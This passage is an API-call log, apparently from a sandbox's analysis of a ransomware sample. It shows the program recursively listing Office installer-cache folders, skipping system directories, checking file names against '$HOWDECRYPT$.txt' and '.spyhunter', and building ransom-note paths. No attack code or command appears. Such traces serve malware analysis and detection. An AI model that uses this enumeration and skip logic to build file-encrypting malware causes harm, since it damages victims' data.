(lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0083.551] GetProcessHeap () returned 0x2c0000 [0083.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x3268b8 [0083.551] GetProcessHeap () returned 0x2c0000 [0083.551] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4d8) returned 0x32f610 [0083.551] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.551] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Windows") returned -1 [0083.551] lstrlenW (lpString="Windows") returned 7 [0083.551] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="$Recycle.bin") returned 1 [0083.551] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.551] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="System Volume Information") returned -1 [0083.551] lstrlenW (lpString="System Volume Information") returned 25 [0083.551] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0083.551] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".spyhunter") returned 0x0 [0083.551] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.551] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="_uninstalling_.png") returned 1 [0083.551] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0083.551] GetProcessHeap () returned 0x2c0000 [0083.551] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xfe) returned 0x337998 [0083.551] GetProcessHeap () returned 0x2c0000 [0083.551] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4e0) returned 0x32f610 [0083.552] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.552] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Windows") returned -1 [0083.552] lstrlenW (lpString="Windows") returned 7 [0083.552] lstrcmpiW (lpString1="msvcr90.dll", lpString2="$Recycle.bin") returned 1 [0083.552] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.552] lstrcmpiW (lpString1="msvcr90.dll", lpString2="System Volume Information") returned -1 [0083.552] lstrlenW (lpString="System Volume Information") returned 25 [0083.552] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0083.552] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".spyhunter") returned 0x0 [0083.552] lstrcmpW (lpString1="msvcr90.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.552] lstrcmpW (lpString1="msvcr90.dll", lpString2="_uninstalling_.png") returned 1 [0083.552] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0083.552] GetProcessHeap () returned 0x2c0000 [0083.552] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x3269a0 [0083.552] GetProcessHeap () returned 0x2c0000 [0083.552] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4e8) returned 0x32f610 [0083.552] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.552] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="Windows") returned -1 [0083.552] lstrlenW (lpString="Windows") returned 7 [0083.552] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="$Recycle.bin") returned 1 [0083.552] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.552] lstrcmpiW (lpString1="OfficeLR.cab", lpString2="System Volume Information") returned -1 [0083.552] lstrlenW (lpString="System Volume Information") returned 25 [0083.552] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0083.552] StrStrIW (lpFirst="OfficeLR.cab", lpSrch=".spyhunter") returned 0x0 [0083.552] lstrcmpW (lpString1="OfficeLR.cab", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.552] lstrcmpW (lpString1="OfficeLR.cab", lpString2="_uninstalling_.png") returned 1 [0083.552] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 79 [0083.552] GetProcessHeap () returned 0x2c0000 [0083.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326a88 [0083.553] GetProcessHeap () returned 0x2c0000 [0083.553] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4f0) returned 0x32f610 [0083.553] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.553] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="Windows") returned -1 [0083.553] lstrlenW (lpString="Windows") returned 7 [0083.553] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="$Recycle.bin") returned 1 [0083.553] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.553] lstrcmpiW (lpString1="OfficeMUI.msi", lpString2="System Volume Information") returned -1 [0083.553] lstrlenW (lpString="System Volume Information") returned 25 [0083.553] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0083.553] StrStrIW (lpFirst="OfficeMUI.msi", lpSrch=".spyhunter") returned 0x0 [0083.553] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.553] lstrcmpW (lpString1="OfficeMUI.msi", lpString2="_uninstalling_.png") returned 1 [0083.553] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi") returned 80 [0083.553] GetProcessHeap () returned 0x2c0000 [0083.553] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3280a8 [0083.553] GetProcessHeap () returned 0x2c0000 [0083.553] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4f8) returned 0x32f610 [0083.553] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.553] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="Windows") returned -1 [0083.553] lstrlenW (lpString="Windows") returned 7 [0083.553] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="$Recycle.bin") returned 1 [0083.553] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.553] lstrcmpiW (lpString1="OfficeMUI.xml", lpString2="System Volume Information") returned -1 [0083.553] lstrlenW (lpString="System Volume Information") returned 25 [0083.553] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0083.553] StrStrIW (lpFirst="OfficeMUI.xml", lpSrch=".spyhunter") returned 0x0 [0083.553] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.554] lstrcmpW (lpString1="OfficeMUI.xml", lpString2="_uninstalling_.png") returned 1 [0083.554] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.xml") returned 80 [0083.554] GetProcessHeap () returned 0x2c0000 [0083.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x328198 [0083.554] GetProcessHeap () returned 0x2c0000 [0083.554] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x500) returned 0x32f610 [0083.554] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="Windows") returned -1 [0083.554] lstrlenW (lpString="Windows") returned 7 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="$Recycle.bin") returned 1 [0083.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.msi", lpString2="System Volume Information") returned -1 [0083.554] lstrlenW (lpString="System Volume Information") returned 25 [0083.554] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0083.554] StrStrIW (lpFirst="OfficeMUISet.msi", lpSrch=".spyhunter") returned 0x0 [0083.554] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.554] lstrcmpW (lpString1="OfficeMUISet.msi", lpString2="_uninstalling_.png") returned 1 [0083.554] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.msi") returned 83 [0083.554] GetProcessHeap () returned 0x2c0000 [0083.554] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328288 [0083.554] GetProcessHeap () returned 0x2c0000 [0083.554] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x508) returned 0x32f610 [0083.554] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="Windows") returned -1 [0083.554] lstrlenW (lpString="Windows") returned 7 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="$Recycle.bin") returned 1 [0083.554] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.554] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="System Volume Information") returned -1 [0083.554] lstrlenW (lpString="System Volume Information") returned 25 [0083.554] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0083.555] StrStrIW (lpFirst="OfficeMUISet.xml", lpSrch=".spyhunter") returned 0x0 [0083.555] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.555] lstrcmpW (lpString1="OfficeMUISet.xml", lpString2="_uninstalling_.png") returned 1 [0083.555] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned 83 [0083.555] GetProcessHeap () returned 0x2c0000 [0083.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328378 [0083.555] GetProcessHeap () returned 0x2c0000 [0083.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x510) returned 0x32f610 [0083.555] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.555] lstrcmpiW (lpString1="osetupui.dll", lpString2="Windows") returned -1 [0083.555] lstrlenW (lpString="Windows") returned 7 [0083.555] lstrcmpiW (lpString1="osetupui.dll", lpString2="$Recycle.bin") returned 1 [0083.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.555] lstrcmpiW (lpString1="osetupui.dll", lpString2="System Volume Information") returned -1 [0083.555] lstrlenW (lpString="System Volume Information") returned 25 [0083.555] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0083.555] StrStrIW (lpFirst="osetupui.dll", lpSrch=".spyhunter") returned 0x0 [0083.555] lstrcmpW (lpString1="osetupui.dll", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.555] lstrcmpW (lpString1="osetupui.dll", lpString2="_uninstalling_.png") returned 1 [0083.555] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 79 [0083.555] GetProcessHeap () returned 0x2c0000 [0083.555] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x326b70 [0083.555] GetProcessHeap () returned 0x2c0000 [0083.555] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x518) returned 0x32f610 [0083.555] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.555] lstrcmpiW (lpString1="pss10r.chm", lpString2="Windows") returned -1 [0083.555] lstrlenW (lpString="Windows") returned 7 [0083.555] lstrcmpiW (lpString1="pss10r.chm", lpString2="$Recycle.bin") returned 1 [0083.555] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.555] lstrcmpiW (lpString1="pss10r.chm", lpString2="System Volume Information") returned -1 [0083.556] lstrlenW (lpString="System Volume Information") returned 25 [0083.556] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0083.556] StrStrIW (lpFirst="pss10r.chm", lpSrch=".spyhunter") returned 0x0 [0083.556] lstrcmpW (lpString1="pss10r.chm", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.556] lstrcmpW (lpString1="pss10r.chm", lpString2="_uninstalling_.png") returned 1 [0083.556] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned 77 [0083.556] GetProcessHeap () returned 0x2c0000 [0083.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x326c58 [0083.556] GetProcessHeap () returned 0x2c0000 [0083.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x520) returned 0x32f610 [0083.556] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.556] lstrcmpiW (lpString1="setup.chm", lpString2="Windows") returned -1 [0083.556] lstrlenW (lpString="Windows") returned 7 [0083.556] lstrcmpiW (lpString1="setup.chm", lpString2="$Recycle.bin") returned 1 [0083.556] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.556] lstrcmpiW (lpString1="setup.chm", lpString2="System Volume Information") returned -1 [0083.556] lstrlenW (lpString="System Volume Information") returned 25 [0083.556] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0083.556] StrStrIW (lpFirst="setup.chm", lpSrch=".spyhunter") returned 0x0 [0083.556] lstrcmpW (lpString1="setup.chm", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.556] lstrcmpW (lpString1="setup.chm", lpString2="_uninstalling_.png") returned 1 [0083.556] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned 76 [0083.556] GetProcessHeap () returned 0x2c0000 [0083.556] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326d40 [0083.556] GetProcessHeap () returned 0x2c0000 [0083.556] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x528) returned 0x32f610 [0083.556] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.557] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0083.557] lstrlenW (lpString="Windows") returned 7 [0083.557] lstrcmpiW (lpString1="Setup.xml", lpString2="$Recycle.bin") returned 1 [0083.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.557] lstrcmpiW (lpString1="Setup.xml", lpString2="System Volume Information") returned -1 [0083.557] lstrlenW (lpString="System Volume Information") returned 25 [0083.557] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0083.557] StrStrIW (lpFirst="Setup.xml", lpSrch=".spyhunter") returned 0x0 [0083.557] lstrcmpW (lpString1="Setup.xml", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.557] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0083.557] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0083.557] GetProcessHeap () returned 0x2c0000 [0083.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x326e28 [0083.557] GetProcessHeap () returned 0x2c0000 [0083.557] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x530) returned 0x32f610 [0083.557] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.557] lstrcmpiW (lpString1="ShellUI.MST", lpString2="Windows") returned -1 [0083.557] lstrlenW (lpString="Windows") returned 7 [0083.557] lstrcmpiW (lpString1="ShellUI.MST", lpString2="$Recycle.bin") returned 1 [0083.557] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.557] lstrcmpiW (lpString1="ShellUI.MST", lpString2="System Volume Information") returned -1 [0083.557] lstrlenW (lpString="System Volume Information") returned 25 [0083.557] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0083.557] StrStrIW (lpFirst="ShellUI.MST", lpSrch=".spyhunter") returned 0x0 [0083.557] lstrcmpW (lpString1="ShellUI.MST", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.557] lstrcmpW (lpString1="ShellUI.MST", lpString2="_uninstalling_.png") returned 1 [0083.557] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned 78 [0083.557] GetProcessHeap () returned 0x2c0000 [0083.557] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x326f10 [0083.557] GetProcessHeap () returned 0x2c0000 [0083.558] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x538) returned 0x32f610 [0083.558] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0 [0083.558] FindClose (in: hFindFile=0x335ea0 | out: hFindFile=0x335ea0) returned 1 [0083.558] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0083.558] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\$HOWDECRYPT$.txt") returned 83 [0083.558] GetProcessHeap () returned 0x2c0000 [0083.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x328468 [0083.558] GetProcessHeap () returned 0x2c0000 [0083.558] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x540) returned 0x32f610 [0083.558] GetProcessHeap () returned 0x2c0000 [0083.558] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ffc8 | out: hHeap=0x2c0000) returned 1 [0083.558] FindNextFileW (in: hFindFile=0x30b3d8, lpFindFileData=0x298f698 | out: lpFindFileData=0x298f698) returned 1 [0083.558] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0083.558] lstrlenW (lpString="Windows") returned 7 [0083.558] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="$Recycle.bin") returned 1 [0083.558] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.558] lstrcmpiW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="System Volume Information") returned -1 [0083.558] lstrlenW (lpString="System Volume Information") returned 25 [0083.558] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned 66 [0083.558] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0083.558] lstrcmpW (lpString1="{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0083.558] GetProcessHeap () returned 0x2c0000 [0083.558] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x30ffc8 [0083.558] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned 68 [0083.558] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 0x335ea0 [0083.821] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.821] lstrlenW (lpString="Windows") returned 7 [0083.821] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.821] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.821] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.821] lstrlenW (lpString="System Volume Information") returned 25 [0083.821] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0083.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.821] StrStrIW (lpFirst=".", lpSrch=".spyhunter") returned 0x0 [0083.821] lstrcmpW (lpString1=".", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.821] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0083.821] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\.") returned 68 [0083.821] GetProcessHeap () returned 0x2c0000 [0083.821] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xca) returned 0x3238b8 [0083.821] GetProcessHeap () returned 0x2c0000 [0083.821] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x4f8) returned 0x32f610 [0083.822] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.822] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.822] lstrlenW (lpString="Windows") returned 7 [0083.822] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.822] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.822] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.822] lstrlenW (lpString="System Volume Information") returned 25 [0083.822] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0083.822] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.822] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.822] StrStrIW (lpFirst="..", lpSrch=".spyhunter") returned 0x0 [0083.822] lstrcmpW (lpString1="..", lpString2="$HOWDECRYPT$.txt") returned 1 [0083.822] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0083.822] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\..") returned 69 [0083.822] GetProcessHeap () returned 0x2c0000 [0083.822] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xcc) returned 0x323990 [0083.823] GetProcessHeap () returned 0x2c0000 [0083.823] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x32f610, Size=0x500) returned 0x32f610 [0083.823] FindNextFileW (in: hFindFile=0x335ea0, lpFindFileData=0x298f348 | out: lpFindFileData=0x298f348) returned 1 [0083.823] lstrcmpiW (lpString1="Access.en-us", lpString2="Windows") returned -1 [0083.823] lstrlenW (lpString="Windows") returned 7 [0083.823] lstrcmpiW (lpString1="Access.en-us", lpString2="$Recycle.bin") returned 1 [0083.823] lstrlenW (lpString="$Recycle.bin") returned 12 [0083.823] lstrcmpiW (lpString1="Access.en-us", lpString2="System Volume Information") returned -1 [0083.823] lstrlenW (lpString="System Volume Information") returned 25 [0083.823] wnsprintfW (in: pszDest=0x30ffc8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned 79 [0083.823] lstrcmpW (lpString1="Access.en-us", lpString2=".") returned 1 [0083.823] lstrcmpW (lpString1="Access.en-us", lpString2="..") returned 1 [0083.823] GetProcessHeap () returned 0x2c0000 [0083.823] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x33efe8 [0083.823] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned 81 [0083.823] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 0x335ee0 [0084.092] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0084.092] lstrlenW (lpString="Windows") returned 7 [0084.092] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0084.092] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.092] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0084.092] lstrlenW (lpString="System Volume Information") returned 25 [0084.092] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\.") returned 81 [0084.092] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.092] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.093] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0084.093] lstrlenW (lpString="Windows") returned 7 [0084.093] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0084.093] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.093] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0084.093] lstrlenW (lpString="System Volume Information") returned 25 [0084.093] wnsprintfW (in: pszDest=0x33efe8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\..") returned 82 [0084.093] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.093] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.093] FindNextFileW (in: hFindFile=0x335ee0, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0084.093] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="Windows") returned -1 [0084.093] lstrlenW (lpString="Windows") returned 7 [0084.093] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="$Recycle.bin") returned 1 [0084.093] lstrlenW (lpString="$Recycle.bin") returned 12 [0084.093] lstrcmpiW (lpString1="AccessMUI.msi", lpString2="System Volume Information") returned -1 [0084.093] lstrlenW (lpString="System Volume Information") returned 25 